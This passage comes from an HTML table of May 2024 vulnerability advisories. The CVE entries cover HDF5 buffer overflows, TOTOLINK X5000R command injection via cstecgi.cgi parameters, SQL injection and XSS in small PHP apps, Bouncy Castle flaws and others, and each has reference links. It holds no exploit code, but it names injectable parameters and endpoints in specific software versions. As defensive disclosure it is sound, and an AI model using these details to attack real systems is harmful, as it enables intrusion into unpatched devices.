<td>A memory corruption vulnerability in SdHost and SdMmcDevice in Insyde InsydeH2O kernel 5.2 before 05.29.09, kernel 5.3 before 05.38.09, kernel 5.4 before 05.46.09, kernel 5.5 before 05.54.09, and kernel 5.6 before 05.61.09 could lead to escalating privileges in SMM.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27353" target="_blank">CVE-2024-27353</a><br><a href="https://www.insyde.com/security-pledge" target="_blank">cve@mitre.org</a><br><a href="https://www.insyde.com/security-pledge/SA-2024001" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>A stored cross-site scripting (XSS) vulnerability in the Filter function of Eramba Version 3.22.3 Community Edition allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the filter name field. This vulnerability has been fixed in version 3.23.0.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27593" target="_blank">CVE-2024-27593</a><br><a href="https://blog.smarttecs.com/posts/2024-002-cve-2024-27593/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Kiteworks Totemomail through 7.0.0 allows /responsiveUI/EnvelopeOpenServlet envelopeRecipient reflected XSS.</td>
<td>2024-05-18</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28063" target="_blank">CVE-2024-28063</a><br><a href="https://www.objectif-securite.ch/advisories/totemomail-reflected-xss.txt" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Kiteworks Totemomail 7.x and 8.x before 8.3.0 allows /responsiveUI/EnvelopeOpenServlet messageId directory traversal for unauthenticated file read and delete operations (with displayLoginChunkedImages) and write operations (with storeLoginChunkedImages).</td>
<td>2024-05-18</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28064" target="_blank">CVE-2024-28064</a><br><a href="https://www.objectif-securite.ch/advisories/totemomail-path-traversal.txt" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>In Bonitasoft runtime Community edition, the lack of dynamic permissions causes IDOR vulnerability. Dynamic permissions existed only in Subscription edition and have now been restored in Community edition, where they are not custmizable.</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28087" target="_blank">CVE-2024-28087</a><br><a href="https://documentation.bonitasoft.com/bonita/latest/release-notes#_fixes_in_bonita_2024_1_2024_04_11" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Sourcecodester School Task Manager 1.0 is vulnerable to Cross Site Scripting (XSS) via add-task.php?task_name=.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28276" target="_blank">CVE-2024-28276</a><br><a href="https://github.com/unrealjbr/CVE-2024-28276" target="_blank">cve@mitre.org</a><br><a href="https://www.sourcecodester.com/download-code?nid=16877&amp;title=School+Task+Manager+Using+PHP+with+Source+Code" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>In Sourcecodester School Task Manager v1.0, a vulnerability was identified within the subject_name= parameter, enabling Stored Cross-Site Scripting (XSS) attacks. This vulnerability allows attackers to manipulate the subject's name, potentially leading to the execution of malicious JavaScript payloads.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28277" target="_blank">CVE-2024-28277</a><br><a href="https://github.com/unrealjbr/CVE-2024-28277" target="_blank">cve@mitre.org</a><br><a href="https://www.sourcecodester.com/download-code?nid=16877&amp;title=School+Task+Manager+Using+PHP+with+Source+Code" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Code-projects Computer Book Store 1.0 is vulnerable to SQL Injection via book.php?bookisbn=.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28279" target="_blank">CVE-2024-28279</a><br><a href="https://code-projects.org/computer-book-store-in-php-with-source-code/" target="_blank">cve@mitre.org</a><br><a href="https://github.com/unrealjbr/CVE-2024-28279" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>A Fault Injection vulnerability in the SymmetricDecrypt function in cryptopp/elgamal.h of Cryptopp Crypto++ 8.9, allows an attacker to co-reside in the same system with a victim process to disclose information and escalate privileges.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28285" target="_blank">CVE-2024-28285</a><br><a href="https://gist.github.com/liang-junkai/3e91f58070812ea76c1b8c126c3e28c7" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 through 1.14.3 contains a heap buffer overflow in H5HG_read, resulting in the corruption of the instruction pointer and causing denial of service or potential code execution.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29157" target="_blank">CVE-2024-29157</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 through 1.14.3 contains a stack buffer overflow in H5FL_arr_malloc, resulting in the corruption of the instruction pointer and causing denial of service or potential code execution.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29158" target="_blank">CVE-2024-29158</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 through 1.14.3 contains a buffer overflow in H5Z__filter_scaleoffset, resulting in the corruption of the instruction pointer and causing denial of service or potential code execution.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29159" target="_blank">CVE-2024-29159</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 through 1.14.3 contains a heap buffer overflow in H5HG__cache_heap_deserialize, resulting in the corruption of the instruction pointer and causing denial of service or potential code execution.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29160" target="_blank">CVE-2024-29160</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 through 1.14.3 contains a heap buffer overflow in H5A__attr_release_table, resulting in the corruption of the instruction pointer and causing denial of service or potential code execution.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29161" target="_blank">CVE-2024-29161</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 through 1.13.3 and/or 1.14.2 contains a stack buffer overflow in H5HG_read, resulting in denial of service or potential code execution.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29162" target="_blank">CVE-2024-29162</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 through 1.14.3 contains a heap buffer overflow in H5T__bit_find, resulting in the corruption of the instruction pointer and causing denial of service or potential code execution.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29163" target="_blank">CVE-2024-29163</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 through 1.14.3 contains a stack buffer overflow in H5R__decode_heap, resulting in the corruption of the instruction pointer and causing denial of service or potential code execution.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29164" target="_blank">CVE-2024-29164</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 through 1.14.3 contains a buffer overflow in H5Z__filter_fletcher32, resulting in the corruption of the instruction pointer and causing denial of service or potential code execution.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29165" target="_blank">CVE-2024-29165</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 through 1.14.3 contains a buffer overflow in H5O__linfo_decode, resulting in the corruption of the instruction pointer and causing denial of service or potential code execution.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29166" target="_blank">CVE-2024-29166</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue in briscKernelDriver.sys in BlueRiSC WindowsSCOPE Cyber Forensics before 3.3 allows a local attacker to execute arbitrary code within the driver and create a local denial-of-service condition due to an improper DACL being applied to the device the driver creates.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29513" target="_blank">CVE-2024-29513</a><br><a href="https://github.com/dru1d-foofus/briscKernelDriver" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered in ECCurve.java and ECCurve.cs in Bouncy Castle Java (BC Java) before 1.78, BC Java LTS before 2.73.6, BC-FJA before 1.0.2.5, and BC C# .Net before 2.3.1. Importing an EC certificate with crafted F2m parameters can lead to excessive CPU consumption during the evaluation of the curve parameters.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29857" target="_blank">CVE-2024-29857</a><br><a href="https://github.com/bcgit/bc-csharp/wiki/CVE%E2%80%902024%E2%80%9029857" target="_blank">cve@mitre.org</a><br><a href="https://github.com/bcgit/bc-java/wiki/CVE%E2%80%902024%E2%80%9029857" target="_blank">cve@mitre.org</a><br><a href="https://www.bouncycastle.org/latest_releases.html" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered in Bouncy Castle Java TLS API and JSSE Provider before 1.78. Timing-based leakage may occur in RSA based handshakes because of exception processing.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30171" target="_blank">CVE-2024-30171</a><br><a href="https://github.com/bcgit/bc-csharp/wiki/CVE%E2%80%902024%E2%80%9030171" target="_blank">cve@mitre.org</a><br><a href="https://github.com/bcgit/bc-java/wiki/CVE%E2%80%902024%E2%80%9030171" target="_blank">cve@mitre.org</a><br><a href="https://www.bouncycastle.org/latest_releases.html" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered in Bouncy Castle Java Cryptography APIs before 1.78. An Ed25519 verification code infinite loop can occur via a crafted signature and public key.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30172" target="_blank">CVE-2024-30172</a><br><a href="https://www.bouncycastle.org/latest_releases.html" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>SQL Injection vulnerability in Cloud based customer service management platform v.1.0.0 allows a local attacker to execute arbitrary code via a crafted payload to Login.asp component.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30801" target="_blank">CVE-2024-30801</a><br><a href="http://cloud.com/" target="_blank">cve@mitre.org</a><br><a href="http://www.minipacs.com/ylqxrj" target="_blank">cve@mitre.org</a><br><a href="https://github.com/WarmBrew/web_vul/blob/main/Cloud%20based%20customer%20service/SQLi.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue in Vehicle Management System 7.31.0.3_20230412 allows an attacker to escalate privileges via the login.html component.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30802" target="_blank">CVE-2024-30802</a><br><a href="https://github.com/WarmBrew/web_vul/blob/main/TTX.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue in Reportico Web before v.8.1.0 allows a local attacker to execute arbitrary code and obtain sensitive information via the sessionid function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31556" target="_blank">CVE-2024-31556</a><br><a href="https://github.com/reportico-web/reportico/issues/53" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Insecure Permission vulnerability in TotalAV v.6.0.740 allows a local attacker to escalate privileges via a crafted file</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31771" target="_blank">CVE-2024-31771</a><br><a href="https://github.com/restdone/CVE-2024-31771" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Buffer Overflow vulnerability in emp-ot v.0.2.4 allows a remote attacker to execute arbitrary code via the FerretCOT&lt;T&gt;::read_pre_data128_from_file function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31803" target="_blank">CVE-2024-31803</a><br><a href="https://github.com/FudanMPL/Vulnerabilities-in-MPC-Framework/tree/main/emp-ot/stack-buffer-overflow-ferret_cot" target="_blank">cve@mitre.org</a><br><a href="https://github.com/emp-toolkit/emp-ot/issues/89" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK EX200 V4.0.3c.7646_B20201211 was discovered to contain a hardcoded password for root at /etc/shadow.sample.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31810" target="_blank">CVE-2024-31810</a><br><a href="https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/EX200/HardCode/HardCode.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>The com.solarized.firedown (aka Solarized FireDown Browser &amp; Downloader) application 1.0.76 for Android allows a remote attacker to execute arbitrary JavaScript code via a crafted intent. com.solarized.firedown.IntentActivity uses a WebView component to display web content and doesn't adequately sanitize the URI or any extra data passed in the intent by any installed application (with no permissions).</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31974" target="_blank">CVE-2024-31974</a><br><a href="https://github.com/actuator/com.solarized.firedown/blob/main/CVE-2024-31974" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an authenticated remote command execution (RCE) vulnerability via the "mtu" parameters in the "cstecgi.cgi" binary.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32349" target="_blank">CVE-2024-32349</a><br><a href="https://github.com/1s1and123/Vulnerabilities/blob/main/device/ToToLink/X5000R/TOTOLink_X5000R_RCE.md" target="_blank">cve@mitre.org</a><br><a href="https://www.totolink.net/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an authenticated remote command execution (RCE) vulnerability via the "ipsecPsk" parameter in the "cstecgi.cgi" binary.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32350" target="_blank">CVE-2024-32350</a><br><a href="https://github.com/1s1and123/Vulnerabilities/blob/main/device/ToToLink/X5000R/TOTOLink_X5000R_RCE.md" target="_blank">cve@mitre.org</a><br><a href="https://www.totolink.net/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an authenticated remote command execution (RCE) vulnerability via the "mru" parameter in the "cstecgi.cgi" binary.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32351" target="_blank">CVE-2024-32351</a><br><a href="https://github.com/1s1and123/Vulnerabilities/blob/main/device/ToToLink/X5000R/TOTOLink_X5000R_RCE.md" target="_blank">cve@mitre.org</a><br><a href="https://www.totolink.net/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain an authenticated remote command execution (RCE) vulnerability via the "ipsecL2tpEnable" parameter in the "cstecgi.cgi" binary.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32352" target="_blank">CVE-2024-32352</a><br><a href="https://github.com/1s1and123/Vulnerabilities/blob/main/device/ToToLink/X5000R/TOTOLink_X5000R_RCE.md" target="_blank">cve@mitre.org</a><br><a href="https://www.totolink.net/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain a command injection vulnerability via the 'port' parameter in the setSSServer function at /cgi-bin/cstecgi.cgi.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32353" target="_blank">CVE-2024-32353</a><br><a href="https://github.com/1s1and123/Vulnerabilities/blob/main/device/ToToLink/X5000R/TOTOLink_X5000R_RCE.md" target="_blank">cve@mitre.org</a><br><a href="https://www.totolink.net/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain a command injection vulnerability via the 'timeout' parameter in the setSSServer function at /cgi-bin/cstecgi.cgi.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32354" target="_blank">CVE-2024-32354</a><br><a href="https://github.com/1s1and123/Vulnerabilities/blob/main/device/ToToLink/X5000R/TOTOLink_X5000R_RCE.md" target="_blank">cve@mitre.org</a><br><a href="https://www.totolink.net/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK X5000R V9.1.0cu.2350_B20230313 was discovered to contain a command injection vulnerability via the 'password' parameter in the setSSServer function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32355" target="_blank">CVE-2024-32355</a><br><a href="https://github.com/1s1and123/Vulnerabilities/blob/main/device/ToToLink/X5000R/TOTOLink_X5000R_RCE.md" target="_blank">cve@mitre.org</a><br><a href="https://www.totolink.net/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 has a heap-based buffer over-read in H5VM_memcpyvv in H5VM.c (called from H5D__compact_readvv in H5Dcompact.c).</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32605" target="_blank">CVE-2024-32605</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 may attempt to dereference uninitialized values in h5tools_str_sprint in tools/lib/h5tools_str.c (called from h5tools_dump_simple_data in tools/lib/h5tools_dump.c).</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32606" target="_blank">CVE-2024-32606</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 has a SEGV in H5A__close in H5Aint.c, resulting in the corruption of the instruction pointer.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32607" target="_blank">CVE-2024-32607</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 allows stack consumption in the function H5E_printf_stack in H5Eint.c.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32609" target="_blank">CVE-2024-32609</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 has a SEGV in H5T_close_real in H5T.c, resulting in a corrupted instruction pointer.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32610" target="_blank">CVE-2024-32610</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 may use an uninitialized value in H5A__attr_release_table in H5Aint.c.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32611" target="_blank">CVE-2024-32611</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 contains a heap-based buffer over-read in H5HL__fl_deserialize in H5HLcache.c, resulting in the corruption of the instruction pointer, a different vulnerability than CVE-2024-32613.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32612" target="_blank">CVE-2024-32612</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 contains a heap-based buffer over-read in the function H5HL__fl_deserialize in H5HLcache.c, a different vulnerability than CVE-2024-32612.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32613" target="_blank">CVE-2024-32613</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 has a SEGV in H5VM_memcpyvv in H5VM.c.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32614" target="_blank">CVE-2024-32614</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 contains a heap-based buffer overflow in H5Z__nbit_decompress_one_byte in H5Znbit.c, caused by the earlier use of an initialized pointer.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32615" target="_blank">CVE-2024-32615</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 contains a heap-based buffer over-read in H5O__dtype_encode_helper in H5Odtype.c.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32616" target="_blank">CVE-2024-32616</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 contains a heap-based buffer over-read caused by the unsafe use of strdup in H5MM_xstrdup in H5MM.c (called from H5G__ent_to_link in H5Glink.c).</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32617" target="_blank">CVE-2024-32617</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 contains a heap-based buffer overflow in H5T__get_native_type in H5Tnative.c, resulting in the corruption of the instruction pointer.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32618" target="_blank">CVE-2024-32618</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 contains a heap-based buffer overflow in H5T_copy_reopen in H5T.c, resulting in the corruption of the instruction pointer.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32619" target="_blank">CVE-2024-32619</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 contains a heap-based buffer over-read in H5F_addr_decode_len in H5Fint.c, resulting in the corruption of the instruction pointer.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32620" target="_blank">CVE-2024-32620</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 contains a heap-based buffer overflow in H5HG_read in H5HG.c (called from H5VL__native_blob_get in H5VLnative_blob.c), resulting in the corruption of the instruction pointer.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32621" target="_blank">CVE-2024-32621</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 contains a out-of-bounds read operation in H5FL_arr_malloc in H5FL.c (called from H5S_set_extent_simple in H5S.c).</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32622" target="_blank">CVE-2024-32622</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 contains a heap-based buffer overflow in H5VM_array_fill in H5VM.c (called from H5S_select_elements in H5Spoint.c).</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32623" target="_blank">CVE-2024-32623</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
